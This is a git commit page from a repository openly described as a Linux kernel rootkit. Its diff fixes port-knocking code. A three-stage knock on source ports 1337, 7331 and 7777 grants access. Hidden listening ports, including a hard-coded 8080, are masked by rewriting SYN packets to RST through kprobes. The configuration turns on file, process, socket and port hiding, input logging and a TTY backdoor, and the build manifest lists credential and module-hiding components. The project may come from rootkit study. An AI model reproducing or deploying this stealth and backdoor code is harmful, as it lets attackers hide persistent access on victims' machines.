fixes port knocking bugs - linux-rootkit - Feature-rich interactive rootkit that targets Linux kernel 4.19, accompanied by a dynamic kernel memory analysis GDB plugin for in vivo introspection (e.g. using QEMU)

commit ae2b6f55f7b5bac1bbf85996f3a21a886474d15c
parent 13caac6bf8947bb7bc5404170b1e0e8914e6b27b
Author: deurzen <devrzen@gmail.com>
Date:   Sun, 10 Jan 2021 03:22:39 +0100

fixes port knocking bugs

Diffstat:
A .tmp_versions/g7.mod  | 3 +++
M src/g7.c  | 3 ++-
M src/porthide.c  | 20 +++++++++++++++-----

3 files changed, 20 insertions(+), 6 deletions(-)
diff --git a/.tmp_versions/g7.mod b/.tmp_versions/g7.mod
@@ -0,0 +1,3 @@
+/root/rootkit-programming-dev/g7.ko
+/root/rootkit-programming-dev/src/pidhide.o /root/rootkit-programming-dev/src/read.o /root/rootkit-programming-dev/src/g7.o /root/rootkit-programming-dev/src/filehide.o /root/rootkit-programming-dev/src/sockhide.o /root/rootkit-programming-dev/src/hook.o /root/rootkit-programming-dev/src/openhide.o /root/rootkit-programming-dev/src/packhide.o /root/rootkit-programming-dev/src/porthide.o /root/rootkit-programming-dev/src/channel.o /root/rootkit-programming-dev/src/modhide.o /root/rootkit-programming-dev/src/inputlog.o /root/rootkit-programming-dev/src/creds.o /root/rootkit-programming-dev/src/backdoor.o
+
diff --git a/src/g7.c b/src/g7.c
@@ -45,7 +45,8 @@ rootkit_t rootkit = {
     .hiding_open    = true,
     .hiding_pids    = true,
     .hiding_sockets = true,
-    .hiding_packets = true,
+    .hiding_packets = false,
+    .hiding_ports   = true,
     .logging_input  = true,
     .backdoor = BD_TTY,
 };
diff --git a/src/porthide.c b/src/porthide.c
@@ -93,6 +93,8 @@ hide_lports(void)
 
     if (register_kprobe(&p_rcv_spkt))
         DEBUG_INFO("[g7] Could not insert kprobe p_rcv_spkt\n");
+
+    hide_lport(8080);
 }
 
 void
@@ -163,27 +165,35 @@ g7_packet_rcv(struct kprobe *kp, struct pt_regs *pt_regs)
         if (list_contains_knock(&ips_stage3, ip, version))
             return 0;
 
+        if (tcphdr->syn || !tcphdr->ack)
+            goto check_port;
+
         if (list_contains_knock(&ips_stage2, ip, version)) {
-            if (src_port == 7777)
+            if (src_port == 7777) {
+                DEBUG_NOTICE("[g7] knocked port %d, port knocking sequence completed\n", src_port);
                 add_knock_to_list(&ips_stage3_tail, ip, version);
+	    }
 
             remove_knock_from_list(&ips_stage2, &ips_stage2_tail, ip, version);
-            goto check_port;
         } else if (list_contains_knock(&ips_stage1, ip, version)) {
-            if (src_port == 7331)
+            if (src_port == 7331) {
                 add_knock_to_list(&ips_stage2_tail, ip, version);
+                DEBUG_NOTICE("[g7] knocked port %d, entering knocking stage 2\n", src_port);
+	    }
 
             remove_knock_from_list(&ips_stage1, &ips_stage1_tail, ip, version);
-            goto check_port;
         } else {
-            if (src_port == 1337)
+            if (src_port == 1337) {
+                DEBUG_NOTICE("[g7] knocked port %d, entering knocking stage 1\n", src_port);
                 add_knock_to_list(&ips_stage1_tail, ip, version);
+	    }
         }
 
 check_port:
         if (list_contains_lport(&hidden_lports, src_port))
             if (tcphdr->syn) {
                 tcphdr->syn = 0;
+                tcphdr->ack = 0;
                 tcphdr->rst = 1;
             }
     }

	linux-rootkit Feature-rich interactive rootkit that targets Linux kernel 4.19, accompanied by a dynamic kernel memory analysis GDB plugin for in vivo introspection (e.g. using QEMU)
	git clone git://git.deurzen.net/linux-rootkit
	Log \| Files \| Refs

A	.tmp_versions/g7.mod	\|	3	+++
M	src/g7.c	\|	3	++-
M	src/porthide.c	\|	20	+++++++++++++++-----